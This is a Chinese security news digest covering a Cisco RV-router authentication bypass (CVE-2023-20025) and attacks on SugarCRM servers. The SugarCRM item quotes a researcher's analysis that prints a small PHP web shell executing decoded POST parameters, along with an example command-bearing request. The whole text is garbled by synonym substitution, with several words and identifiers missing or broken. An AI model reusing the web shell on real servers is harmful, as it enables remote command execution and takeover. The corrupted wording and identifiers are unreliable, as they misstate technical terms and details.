内存平安周报第124期 | 报废路由器中存在具有公开操纵代码的身份验证绕过破绽

一、 Cisco警告：报废的路由器中存在具有公开操纵代码的身份验证绕过破绽 （1 .11）

今天，思科警告客户重视一个影响多款报废VPN路由器且具有公开操纵代码的严峻的身份验证绕过破绽。

详尽情状

该平安破绽 (CVE-2023-20025) 是奇虎360 Netlab 的Hou Liuyang在 Cisco Small Business RV016、RV042、RV042G 和 RV082 路由器的基于Web的治理界面中发现的。

那是因为传进 恳求来长途操纵该破绽进而绕过身份验证。

胜利操纵该破绽能够获得 root 拜候权限。思科今天还表达，进攻者若组合操纵该破绽与另一个被跟踪为CVE-2023-2002的破绽，能够在底层操做系统上施行肆意号令。

Cisco固然将其评为严峻破绽，同时表达其产物平安事务响应团队(PSIRT)晓得野外可用的概念验证破绽操纵代码，但仍是表达：“没有也不会发布软件更新来处理那个破绽。”

幸运的是，Cisco PSIRT没有发现有该破绽在进攻中被滥用。

禁用治理界面以阻遏进攻

固然RV016 和 RV082 WAN VPN 路由器最初出卖是在 2016年1月和2016年5月，但其最初订购日期是2020 年1月30日，而且那两款路由器在2025年1月31日之前都能得到撑持。

固然没有此破绽的处理办法，治理员也能够禁用存在破绽的路由器的基于Web的治理界面并阻遏拜候端口443和60443，进而阻遏操纵测验考试。

为此，您必需登录到每个设备的基于Web的治理界面，再转到防火墙常规，然后取缔长途治理的勾选。

Cisco在今天发布的平安通知布告中，还供给了详尽步调来阻遏拜候端口443和60443。

施行上述缓解办法后，仍可拜候受影响的路由器并通过LAN接口停止设置装备摆设。

参考链接

二、数百台SugarCRM 办事器因严峻的在野进攻被传染（1 .12）

展开全文

进攻者操纵该破绽通过Web Shell后门传染当地办事器。

详尽信息

在过往的两周里，黑客都在操纵SugarCRM（客户关系治理）系统中的一个严峻破绽，让用户传染歹意软件，使他们可以完全掌握本身的办事器。

12月下旬，该零日破绽的操纵代码在网上被公布。发布该破绽的人称其为长途施行代码的身份验证绕过，那意味着进攻者操纵它在有破绽的办事器上运行歹意代码，而且无需凭证。

收集监控办事公司Censys的高级平安研究员 Mark Ellzey在一封电子邮件中表达，截至1月11日，该公司已检测到354台SugarCRM办事器因该零日破绽被操纵而传染。那大约占Censys检测到的总计3,059台SugarCRM办事器的12%。截至上周，被传染的办事器数量最多的是美国，有90台，其次是德国、澳大利亚和法国。在周二的更新中，Censys表达传染数量自最后发布以来并未增加太多。

SugarCRM于1月5日发布的通知布告供给了修复法式，还表达已将修复法式利用到了他们的基于云的办事。它还定见在SugarCloud或SugarCRM托管主机之外运行实例的用户安拆修复法式。通知布告表达，该破绽影响了Sugar Sell、Serve、Enterprise、Professional和Ultimate软件处理计划。它没有影响Sugar Market的软件。

Censys表达，身份验证绕过次要针对 /index.php/ 目次。“身份验证绕过胜利后，从办事中获取一个 cookie，然后将二次POST恳求发送到途径'/cache/images/sweet.phar'，那一途径会上传一个包罗 PHP 代码的小型PNG编码文件，当那个文件发出另一个恳求时，办事器会施行那一文件”，公司研究人员填补道。

当利用hexdump软件阐发二进造文件并解码时，PHP 代码大致翻译为：

〈?php

echo“#####”；

passthru(_decode($_POST[“c”]));

echo“#####”；

“那是一个简单的web shell，它将根据 'c' 的编码查询参数值施行号令（例如，'POST /cache/images/sweet.phar?c=”L2Jpbi9pZA==””，帖子阐明道。

Web shell供给了一个基于文本的窗口，进攻者能够操纵其在受传染的设备上运行号令或他们抉择的代码界面。Censys的Ellzey表达，无法弄清晰进攻者利用那些shell的目标。

Censys和SugarCRM通知布告中都供给了威胁目标，SugarCRM的客户能够操纵那些目标来揣度他们能否已成为进攻目标。利用具有破绽的产物的用户应尽快查询拜访并安拆修复法式。

参考链接